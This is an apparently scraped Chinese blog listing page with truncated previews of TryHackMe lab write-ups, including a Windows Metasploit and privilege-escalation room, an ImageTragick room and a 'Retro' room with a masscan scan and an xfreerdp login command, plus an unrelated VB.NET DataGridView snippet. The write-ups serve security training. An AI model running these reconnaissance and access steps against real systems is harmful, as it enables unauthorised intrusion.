侵入一台 Windows 机器。使用metasploit进行初始访问,并利用powershell进行Windows权限提升枚举,并学习一种新技术来获得管理员访问权限。
TryHackMe新手村
weixin_55154296的博客
04-17 7609
TryHackMe 最近在外网发现了一个在线黑客学习网站:TryHackMe ,缺点是好像需要一些上网技巧,而且全英,免费用户每天只能用一小时,付费(大概一个月6、70)无限制. 以下附上刚入门时的坑 在tutorial的第一个问题,问的是 Follow the steps in this task. What is the flag text shown on the website of the machine you started on this task? 意思我都读懂了,但是我填flag、c
TryHackMe - magician靶场
z4yn:)的博客
03-12 255
magician CVE-2016–3714 This magical website lets you convert image file formats 0x01 信息收集 Nmap扫描端口开放服务,开放了21,8080,8081端口 根据靶场提示要把ip指向域名:magician 0x02 漏洞利用(CVE-2016–3714) 先访问21端口,有个匿名访问,被做了点手脚“延迟”。登录进去里面是空的,根据提示访问https://imagetragick.com. 根据给的..
Tryhackme - Retro
冬萍子癸水
05-28 1125
1 扫描 80进网页搜集信息,3389是远程控制端口 可以xfreerdp /u:wade /v:10.10.140.239然后远程控制桌面。但是要知道密码。或者用别的方法登进去。 C:\root> masscan -p1-65535,U:1-65535 10.10.140.239 --rate=1000 -e tun0 Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-05-28 00:41:40 GMT -- forced optio
vb.net DataGridView有多个逗号分隔的字符串,例如"John,Doe,25,Programmer"、"Alice,Wonderland,30,Designer"、"Bob,Smith,40,Engineer",分别赋值到指定索引几行单元格,自动增加行,每行代码带注释
06-11
下面是一个示例代码,可以将多个逗号分隔的字符串分别赋值到指定索引几行单元格,并自动增加行。每行代码都带有注释: ```vb.net ' 创建一个列表,用于存储逗号分隔的字符串 Dim data As List(Of String) = New List(Of String)() ' 添加逗号分隔的字符串 data.Add("John,Doe,25,Programmer") data.Add("Alice,Wonderland,30,Designer") data.Add("Bob,Smith,40,Engineer") ' 获取 DataGridView 控件 Dim dataGridView As DataGridView = Me.DataGridView1 ' 获取当前行数 Dim rowCount As Integer = dataGridView.Rows.Count ' 自动增加行 dataGridView.Rows.Add(data.Count) ' 遍历逗号分隔的字符串列表 For i As Integer = 0 To data.Count - 1 ' 将逗号分隔的字符串分隔成一个字符串数组 Dim values As String() = data(i).Split(","c) ' 遍历字符串数组,将每个字符串赋值到指定的单元格中 For j As Integer = 0 To values.Length - 1 ' 获取要赋值的单元格 Dim cell As DataGridViewCell = dataGridView.Rows(rowCount + i).Cells(j) ' 将字符串赋值到单元格 cell.Value = values(j) Next Next ``` 这段代码中,我们首先创建一个列表,用于存储逗号分隔的字符串。然后,我们获取 `DataGridView` 控件,并自动增加行数。接着,我们遍历逗号分隔的字符串列表,将每个字符串分隔成一个字符串数组,并遍历字符串数组,将每个字符串赋值到指定的单元格中。最后,我们将每个逗号分隔的字符串赋值到指定的行中。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值